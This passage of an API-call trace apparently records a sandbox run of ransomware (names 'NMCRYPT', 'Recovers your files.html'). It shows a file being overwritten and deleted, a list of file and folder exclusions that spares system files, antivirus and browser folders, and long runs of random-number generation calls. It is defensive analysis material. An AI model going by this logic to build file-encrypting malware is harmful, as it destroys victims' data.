lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0165.538] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned 1 [0165.538] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg")) returned 0 [0165.539] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" [0165.539] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0165.539] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFA25.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfa25.tmp")) returned 0xfa25 [0165.540] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFA25.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfa25.tmp"), dwFlags=0x1) returned 0 [0165.541] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFA25.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfa25.tmp")) returned 1 [0165.541] CryptDestroyKey (hKey=0x9ad838) returned 1 [0165.541] wcslen (_String="OK") returned 0x2 [0165.541] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.541] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0165.541] CryptDestroyKey (hKey=0x9ad478) returned 1 [0165.541] CryptDestroyHash (hHash=0x9ad278) returned 1 [0165.541] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*NMCRYPT") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*Recovers your files.html") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*.exe") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*.dll") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*.lnk") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*.bat") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*.ini") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*.msi") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*.scf") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*pagefile.sys*") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*NTUSER.DAT*") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*AppData*") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\winrar\\*") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0165.541] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\java\\*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\windows\\*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\ESET\\*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\AVG\\*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\AVIRA\\*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*Atheros*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*Realtek*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*bootmgr*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*boot*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*boot*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*CONFIG.SYS*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*IO.SYS*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*MSDOS.SYS*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*NTDETECT.COM*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*ntldr*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*chrome*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*opera*") returned 0 [0165.542] PathMatchSpecW (pszFile="Shorthand.emf", pszSpec="*firefox*") returned 0 [0165.542] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf", pszSpec="*") returned 1 [0165.542] strlen (_Str="NMoreira") returned 0x8 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.543] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.544] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 